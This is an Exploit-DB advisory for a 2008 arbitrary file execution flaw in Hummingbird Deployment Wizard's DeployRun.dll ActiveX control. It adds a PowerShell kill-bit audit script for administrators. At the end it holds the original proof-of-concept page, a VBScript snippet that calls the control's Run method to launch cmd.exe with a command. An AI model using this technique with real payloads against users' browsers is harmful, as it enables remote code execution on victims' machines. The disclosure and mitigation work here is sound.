Vendor: Hummingbird Deployment Wizard 2008
Author: shinnai
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Execution
CWE: 94
Product Name: Hummingbird Deployment Wizard 2008
Affected Version From: 10.0.0.44
Affected Version To: 10.0.0.44
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2008

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution

Hummingbird Deployment Wizard 2008 (DeployRun.dll) is vulnerable to arbitrary file execution. The control implements IObjectSafety and reports itself safe for untrusted callers and data, so a web page loaded in Internet Explorer can script it. The vulnerable method is Sub Run(ByVal Path As String, ByVal CommandLine As String), which launches the given executable with the given command line. This exploit was tested on Windows XP Professional SP3, fully patched, with Internet Explorer 7.

Mitigation:

Update to the latest version of Hummingbird Deployment Wizard 2008 (DeployRun.dll) to mitigate this vulnerability.
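The following PowerShell script is an added example for administrators; it is not part of the advisory or of the vendor's software. It audits, and with -Apply sets, the Internet Explorer ActiveX kill bit (Compatibility Flags 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}) for the DeployRun.dll control, and reports whether the control is registered and which DLL version it points at. The CLSID is the one used in the advisory's proof of concept; the registry layout is the standard IE kill-bit mechanism and is assumed to apply to the Windows versions in use. The kill bit only stops IE from instantiating the control from script; it does not fix the DLL, so the vendor update remains the actual fix, and it will also block any legitimate web-based use of the Deployment Wizard.

```powershell
<#
  Added example, not part of the original advisory or the vendor's software.
  Audits (and with -Apply, sets) the Internet Explorer ActiveX kill bit for the
  DeployRun.dll control. The CLSID is taken from the advisory's proof of concept;
  everything else is the generic kill-bit procedure. Run in an elevated session.
#>
[CmdletBinding()]
param(
    [switch]$Apply   # without -Apply the script only reports
)

$Clsid   = '{7F9B30F1-5129-4F5C-A76C-CE264A6C7D10}'   # DeployRun.dll control (from the PoC)
$KillBit = 0x400                                        # COMPAT_EVIL_DONT_LOAD flag

# Native registry view and, on 64-bit Windows, the 32-bit view used by 32-bit IE.
$CompatPaths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $CompatPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatFlags {
    param([string]$Path)
    if (-not (Test-Path -Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    $flags = Get-CompatFlags -Path $Path
    return ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path -Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $flags = Get-CompatFlags -Path $Path
    # OR the kill bit in so any other compatibility flags already present are kept
    $new = if ($null -eq $flags) { $KillBit } else { $flags -bor $KillBit }
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord `
        -Value $new -Force | Out-Null
}

# Is the control registered on this host at all? InprocServer32 holds the DLL path.
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
if (Test-Path -Path $inproc) {
    $dll = (Get-ItemProperty -Path $inproc).'(default)'
    Write-Output "Control $Clsid is registered: $dll"
    if ($dll -and (Test-Path -Path $dll)) {
        $ver = (Get-Item -Path $dll).VersionInfo.FileVersion
        Write-Output "  file version: $ver  (advisory: 10.0.0.44 and earlier affected)"
    }
} else {
    Write-Output "Control $Clsid is not registered on this host."
}

foreach ($p in $CompatPaths) {
    $set = Test-KillBit -Path $p
    Write-Output ("{0}: kill bit {1}" -f $p, $(if ($set) { 'SET' } else { 'NOT SET' }))
    if ($Apply -and -not $set) {
        Set-KillBit -Path $p
        Write-Output "  -> kill bit applied"
    }
}
```

Run it without arguments first to see whether the control is present and whether the kill bit is already set (for example by a later vendor or Microsoft update); run it with -Apply to set the bit on hosts that cannot be updated immediately.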

Exploit-DB raw data:

------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe: Safe for untrusted: caller,data
 IPersist Safe: Safe for untrusted: caller,data

 Vulnerable method:
 Sub Run(ByVal Path As String, ByVal CommandLine As String)

 Tested on Windows XP Professional SP3, fully patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
   test.Run "cmd.exe", "/C calc.exe"
 End Sub
</script>

# milw0rm.com [2008-10-17]